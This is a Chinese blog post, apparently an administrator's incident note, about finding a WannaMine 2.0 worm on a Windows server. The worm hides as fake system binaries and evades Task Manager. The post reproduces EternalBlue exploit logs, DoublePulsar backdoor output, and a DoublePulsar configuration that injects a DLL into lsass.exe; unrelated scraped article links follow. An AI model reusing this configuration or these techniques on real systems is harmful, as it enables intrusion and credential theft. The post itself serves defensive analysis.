近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。

打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

出于好奇心紧接着打开stage1.txt,看到如下内容:

[*] Connecting to target for exploitation.

    [+] Connection established for exploitation.

[*] Pinging backdoor...

    [+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump ( bytes):

0x00000000    6e  6f             Windows Server

0x00000010          6e          R2 Enterpris

0x00000020                   e  Service P

0x00000030    6b                                   ack .

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

    ................DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

    [+] Sending SMBv2 buffers

        ..........DONE.

    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

    DONE.

[*] Receiving response from exploit packet

这不正是一个SMB攻击,再看一下同目录下的stage2.txt:

[+] Selected Protocol SMB

[.] Connecting to target...

[+] Connected to target, pinging backdoor...

    [+] Backdoor returned code:  - Success!

    [+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2

    SMB Connection string is: Windows Server  R2 Enterprise  Service Pack

    Target OS is:  R2 x64

    Target SP is:

    [+] Backdoor installed

    [+] DLL built

    [.] Sending shellcode to inject DLL

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Command completed successfully

<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">

  <inputparameters>

    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">

      <value>10.244.251.57</value>

    </parameter>

    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>

    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">

      <default>stdout</default>

      <value>stdout</value>

    </parameter>

    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">

      <default>false</default>

      <value>false</value>

    </parameter>

    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">

      <default>SMB</default>

      <value>SMB</value>

      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>

      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>

    </paramchoice>

    <paramchoice name="Architecture" description="Architecture of the target OS">

      <default>x64</default>

      <value>x64</value>

      <paramgroup name="x86" description="x86 32-bits"></paramgroup>

      <paramgroup name="x64" description="x64 64-bits"></paramgroup>

    </paramchoice>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <default>OutputInstall</default>

      <value>RunDLL</value>

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">

        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>

      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">

        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">

          <value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>

        </parameter>

        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">

          <default>lsass.exe</default>

          <value>lsass.exe</value>

        </parameter>

        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

      </paramgroup>

      <paramgroup name="RunShellcode" description="Run raw shellcode">

        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>

    </paramchoice>

  </inputparameters>

  <outputparameters>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">

        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

    </paramchoice>

  </outputparameters>

</config>

基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。

服务器中了蠕虫病毒Wannamine2.0小记的更多相关文章

  1. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  2. 3.Windows应急响应:蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播, 每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序.常见的蠕虫 ...

  3. 30天轻松学习javaweb_Eclipse在修改了web.xml后将自动更新到tomcat服务器中

    context.xml中增加<WatchedResource>WEB-INF/web.xml</WatchedResource>,Eclipse在修改了web.xml后将自动更 ...

  4. 注册asp.net 4.0版本到IIS服务器中

    在IIS服务器的运维的过程中,有时候部署asp.net网站发现未安装.net framework对应版本信息,此时就需要重新将.net framework对应的版本注册到IIS中,此处以重新注册.ne ...

  5. [转帖]Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染 https://www.kubernetes.org.cn/5951.html 本来想说可以用 official版本的镜像 但是一 ...

  6. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  7. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  8. Ramnit蠕虫病毒分析和查杀

    Ramnit是一种蠕虫病毒.拥有多种传播方式,不仅可以通过网页进行传播,还可以通过感染计算机内可执行文件进行传播.该病毒在2010年第一次被安全研究者发现,从网络威胁监控中可以看出目前仍然有大量的主机 ...

  9. Trick蠕虫病毒来袭!幕后主使竟是一名高中生“黑客”!

    黑客一直是美国电影中的重要元素,很多经典大片中都有黑客的身影,如战争游戏.黑客帝国等.电影中黑客总是神通广大.行侠仗义,<战争游戏>中的年轻黑客大卫•莱特曼利用黑客技术避免引爆核武器,&l ...

随机推荐

  1. Android官方导航栏ActionBar(二)—— Action View、Action Provider、Navigation Tabs的详细用法

    在上一篇文章(Android之官方导航栏ActionBar)中,我们介绍了ActionBar各组成部分的基本应用.ActionBar除了提供Action Buttons外,还提供了多种导航方式如 Ac ...

  2. gcc 头文件依赖关系 分析工具

    http://gernotklingler.com/blog/open-source-tools-examine-and-adjust-include-dependencies/

  3. 基于Ubuntu搭建Seafile专属网盘

    系统要求: Ubuntu 16.04.1 LTS 64 位操作系统 安装 Seafile 服务器 安装依赖环境 在 Debian/Ubuntu 系统下,可以使用以下命令安装 MySQL: sudo a ...

  4. SpringCloud服务间调用

    SpringCloud服务间的调用有两种方式:RestTemplate和FeignClient.不管是什么方式,他都是通过REST接口调用服务的http接口,参数和结果默认都是通过jackson序列化 ...

  5. hexo + Github Page 0元建立博客攻略

    传送门: 5分钟 0元搭建个人独立博客网站(一):https://mp.weixin.qq.com/s/69isJE191WV2gaVbjrwTtw 5分钟 0元搭建个人独立博客网站(二):https ...

  6. Fluent动网格【2】:Profile文件

    动网格中一个重要任务是部件运动方式的指定.在动网格中指定部件的运动,往往将部件的运动方式指定为其加速度.速度或位移与时间的相关关系,本文主要讲述如何在Fluent中利用瞬态Profile文件指定部件的 ...

  7. 解决python3 UnicodeEncodeError: 'gbk' codec can't encode character '\xXX' in position XX

    从网上抓了一些字节流,想打印出来结果发生了一下错误: UnicodeEncodeError: 'gbk' codec can't encode character '\xbb' in position ...

  8. Python序列化之Json基础

    python的序列化就是将python的基本对象转换为字符串的过程,反之则是反序列化. 序列化类型: -> import json import pickle 序列化定义: 序列化:对象.列表. ...

  9. Coding in Delphi(前4章翻译版本) (PDF)

      第四章翻译完成有一段时间了 写在前面的话       本次翻译纯属爱好,目的是提高对英文文档的理解和阅读能力,本文档大部分采用直 译的方式,而且保留了原来的英文.目的只是辅助大家理解,不喜勿喷.翻 ...

  10. [转]css实现左侧宽度自适应,右侧固定宽度

    原文地址:https://segmentfault.com/a/1190000008411418 页面布局中经常用会遇到左侧宽度自适应,右侧固定宽度,或者左侧宽度固定,右侧自适应.总之就是一边固定宽度 ...